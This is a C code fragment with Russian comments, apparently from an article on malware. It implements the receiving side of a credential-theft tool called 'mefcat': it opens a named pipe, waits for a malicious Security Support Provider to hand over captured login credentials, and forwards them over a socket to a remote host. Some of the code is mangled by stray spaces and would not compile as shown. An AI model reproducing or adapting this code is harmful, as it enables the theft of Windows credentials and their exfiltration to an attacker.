// Название именованного канала, через который будут общаться SSP и mefcat

#define PIPE_NAME L"\\\\.\\ pipe\\ communicate"

DWORD procCommunicate ( ) {

BOOL err = 0 ;

// Создаем глобальное событие, указывающее нашему SSP, что mefcat готов к работе

hEvent = CreateEventW ( NULL , TRUE , FALSE , L"Global \ \ active" ) ;

if ( hEvent == NULL ) {

DWORD err = GetLastError () ;

// Если событие уже создано, то получаем его handle

if ( err == ERROR_ALREADY_EXISTS ) {

hEvent = OpenEventW ( EVENT_ALL_ACCESS , FALSE , L"Global \ \ active" ) ;

if ( hEvent == NULL ) {

printf ( "Cannot create|open event. exiting.. . \ n " ) ;

exit ( - 1 ) ;

}

}

}

/ * Cоздаем именованный канал передачи данных. Здесь mefcat выступает в роли сервера, который создает именованный pipe и ждет подключения от SSP */

hpPass = CreateNamedPipeW (

PIPE_NAME ,

PIPE_ACCESS_DUPLEX ,

PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE | PIPE_WAIT ,

PIPE_UNLIMITED_INSTANCES ,

1024 ,

1024 ,

0 ,

NULL ) ;

if ( hpPass == INVALID_HANDLE_VALUE ) {

printf ( "Error creating named pipe: %d \ n " , GetLastError ()) ;

return 1 ;

}

// Устанавливаем событие в сигнальное состояние ( говорим SSP, что мы готовы к работе)

SetEvent ( hEvent ) ;

waitConnect :

printf ( "Zetting for a cl13nt to c0nn3ct.. . \ n " ) ;

// Ожидаем подключения к нашему каналу SSP

if ( ConnectNamedPipe ( hpPass , NULL ) != TRUE & & GetLastError ( ) != ERROR_PIPE_CONNECTED ) {

printf ( "Error connecting to communicate channel: %d \ n " , GetLastError ()) ;

goto waitConnect ;

}

printf ( "Client connected. \ n " ) ;

// После подключения ожидаем получения учетных данных от SSP

while ( 1 ) {

if ( err )

exit ( 1 ) ;

char buf [ 1024 ] = { 0 } ;

DWORD bytesRead ;

DWORD bytesWritten ;

// Получаем данные от SSP

if ( ReadFile ( hpPass , buf , sizeof ( buf ) , & bytesRead , NULL ) ) {

printf ( "sending the leaked info to the host. . . \ n " ) ;

/ * Отправляем учетные данные на удаленный хост netfd — дескриптор сокета, созданный mefcat при подключении к удаленному хосту */

if ( send ( netfd , buf , bytesRead , 0 ) == SOCKET_ERROR ) {

// Если удаленный хост закрыл соединение, то выходим

if ( WSAGetLastError ( ) == WSAECONNRESET || WSAGetLastError ( ) == WSAECONNABORTED ) {

printf ( "remote host disconnected. . . \ n " ) ;

err = 1 ;

}

}

}

else {

if ( GetLastError ( ) == ERROR_BROKEN_PIPE ) {

// Закрываем текущее соединение, переподключаем listener

DisconnectNamedPipe ( hpPass ) ;

hpPass = NULL ;

printf ( "PIPE HAS BROKEN goto up : ( \ n " ) ;

goto waitConnect ;

}

}

}

return 0 ;